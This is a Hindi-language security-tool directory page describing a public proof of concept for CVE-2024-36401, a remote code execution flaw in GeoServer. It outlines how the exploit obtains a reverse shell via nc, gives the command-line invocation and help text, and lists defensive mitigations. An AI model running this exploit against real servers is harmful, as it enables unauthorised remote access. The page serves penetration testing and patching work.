Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36401 — CVE-2024-36401 के लिए POC। यह POC vlun लक्ष्यों से रिवर्स शेल स्थापित करने का प्रयास करेगा। | Kitploit
उपकरण/GitHubGitHub/bigb0x/cve-2024-36401
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

CVE-2024-36401 के लिए POC। यह POC vlun लक्ष्यों से रिवर्स शेल स्थापित करने का प्रयास करेगा।

रिपॉजिटरी देखें
341512 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-36401 के लिए RCE

CVE-2024-36401 GeoServer के लिए POC। यह POC लक्ष्यों से एक रिवर्स सिस्टम शेल स्थापित करने का प्रयास करेगा।

Banner

अवलोकन

CVE-2024-36401 के लिए POC: GeoServer के संस्करण 2.25.1, 2.24.3 और 2.23.5 से पहले के GeoServer के लिए RCE। यह POC phith0n द्वारा सुरक्षा सलाह पर आधारित है।

यह कैसे काम करता है

  1. आपकी मशीन पर लक्ष्य से आने वाले रिवर्स शेल के लिए एक लिसनर सेट करता है।
  2. यह POC पेलोड के साथ एक POST अनुरोध भेजेगा।
  3. लक्ष्य सर्वर पर एक शेल स्थापित करने का प्रयास करता है।
  4. यह तकनीक मानती है कि लक्ष्य पर nc स्थापित है।

उपयोग कैसे करें

यह POC vlun लक्ष्यों से एक रिवर्स शेल स्थापित करने का प्रयास करेगा। यह vlun Linux लक्ष्यों के विरुद्ध काम करने के लिए लक्षित है। इस POC को चलाने के लिए आपके पास एक प्रकाशित और सुलभ IP वाली मशीन होनी चाहिए।

न्यूनतम आवश्यकताएँ

  • Python 3.6 या उच्चतर
  • requests लाइब्रेरी

एकल लक्ष्य के विरुद्ध इस POC का उपयोग करने के लिए:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

सहायता:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

अपने GeoServer उपकरण की सुरक्षा कैसे करें

1- WFS अनुरोधों को अक्षम करें।

2- अपने Linux को iptables कॉन्फ़िगर करके रिवर्स कनेक्शन को अक्षम करें, सभी ट्रैफ़िक को ड्रॉप करने के लिए डिफ़ॉल्ट नीतियाँ सेट करें, स्थापित और संबंधित कनेक्शनों की अनुमति दें, और केवल DNS, HTTP और HTTPS जैसे आवश्यक आउटबाउंड ट्रैफ़िक की अनुमति दें।

3- या GeoServer के नवीनतम संस्करण में अपग्रेड करें।

संपर्क

किसी भी सुझाव या विचार के लिए, कृपया मुझसे संपर्क करें।

अस्वीकरण

मुझे केवल मनोरंजन, कार्य और शैक्षिक उद्देश्यों के लिए अपने स्वयं के उपकरण बनाना पसंद है। मैं किसी भी सिस्टम या नेटवर्क में हैकिंग या अनधिकृत पहुँच का समर्थन या प्रोत्साहन नहीं करता हूँ। कृपया मेरे उपकरणों का जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जहाँ आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें